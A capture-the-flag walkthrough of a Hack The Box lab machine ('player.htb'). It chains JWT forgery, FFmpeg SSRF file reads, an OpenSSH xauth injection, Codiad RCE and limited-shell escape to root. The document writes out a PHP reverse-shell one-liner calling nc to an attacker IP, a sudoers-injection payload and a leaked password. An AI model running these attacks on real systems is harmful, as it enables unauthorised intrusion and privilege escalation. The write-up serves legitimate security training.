In this article you well learn the following:
- Scanning targets using nmap.
- Identifying php backup file.
- Playing with JWT ( Json Web Token ).
- Exploiting FFmpeg Software.
- Scan for Vhosts.
- Exploiting OpenSSH 7.2p1 xauth Command Injection.
- Identify and exploit Codiad Web Based IDE.
- Escape Limited Shell.
- Monitor Processes via Pspy64.
- Exploiting POI ( PHP Object Injection ).
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11
80/tcp open http Apache httpd 2.4.7
6686/tcp open ssh OpenSSH 7.2 (protocol 2.0)
Firstly, i checked the http port 80 and i got a forbidden page, and I run gobuster tool to bruteforce directorys .
I found /launcher with 301 code , open an application named playBuf.
I checked the feature in the application with Burpsuite .
I found that ( Send ) button make a get request to another page that have JWT and then redirect us to index.html, so I tried to see the JWT with ( https://jwt.io ).
After alot of enumeration I found a backup of this page http://10.10.10.145/launcher/dee8dc8a47256c64630d803a4c40786c.php~, and have the code that generate JWT and decode it.
I start analyzing the php code , they replace the ‘ _ ‘ in key with ‘/‘ and then base64 decode.
As a first step I know what the code do , then there’s a check if the access_code in access variable in cookie match this ‘0E76658526655756207688271159624026011393‘ with redirect us to a new directory , we make a simple php code that change the access_code and encrypt it with the right key.
After running the code I got the new JWT.
I changed the token and send it to dee8dc8a47256c64630d803a4c40786c.php, then redirect me to new directory 7F2dcsSdZo6nj3SNMTQ1/ with new application.
After I make some enumeration I found it’s ffmpeg software ( open-soucre project used for processing audio and video formats ) , there’s SSRF exploit in this software this is good report from hackerone. ** https://hackerone.com/reports/115978 **
After installing the script that generate the .avi file to make LFI (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS) I uploaded the .avi file to the system.
By clicking on “Buffed Media” and downloading the .avi file , and here’s the magic I got passwd for the server.
– I installed a script to bruteforce vhosts make some filter with status code and content length and i found 2 vhosts.
* ruby scan.rb –ip=10.10.10.145 –host=player.htb
* dev.player.htb , staging.player.htb *
I found that there are some error messages on some features, after checking all pages and try all features , there’s error message in contact.php
I found two file in the server , I will read it using ssrf exploit (FFmpeg)
* python gen_avi.py file:///var/www/backup/service_config config.avi
I got creds from /var/www/backup/service_config
I tried this credentials into ssh and I got lshell or ( limited shell ).
I searched for exploit OpenSSH 7.2 and I found an exploit.
After running the script I got shell access as user.
I read the fix.php file that i not read it , and I got a new credentials : peter:CQXpm\z)G5D#%S$y=
-After a lot of enumeration and trying this creds in ssh with no success, I found that creds valid on http://dev.player.htb/ , and open for us a new system.
After some search and digging into source code I found what is this:
– I found a word ( codiad ) and I searched about it in google and found Codiad RCE
I tryied it and worked with Peter credsa and I got a shell.
After getting a reverse shell I tried to switch user to telegen, but there’s lshell. So, I searched how to bypass this and I found there’s option with:
* su telegen -s /bin/bash
After an hour i decided to get pspy64 to see the processes and I found there’s cronjob run by root in interesting path :
* python -m SimpleHTTPServer 80
* wget http://10.10.14.20/pspy64
I checked /var/lib/playbuff directory to see what on it .
After that, I saw the buff.php , it’s use serializtion. Good link for this type of attack:
– there’s two way to got root :
- php object injection.
- I can switch to www-data and change database connection file to reverse shell : /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
** Method 1: via POI ( PHP Object Injection )
I edited /etc/sudoers to make user telegen run anything
– telegen ALL=(ALL)ALL
etc/sudoers”;s:7:”logData”;s:20:”telegen ALL=(ALL)ALL”;}’ > merge.log
– wait 1 min
– sudo -l
** Method 2: via edit database file
echo ‘<?php system(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc 10.10.14.20 9909 >/tmp/f”);?>’ > /var/www/html/launcher/
– nc -lvp 9909
– wait 1 min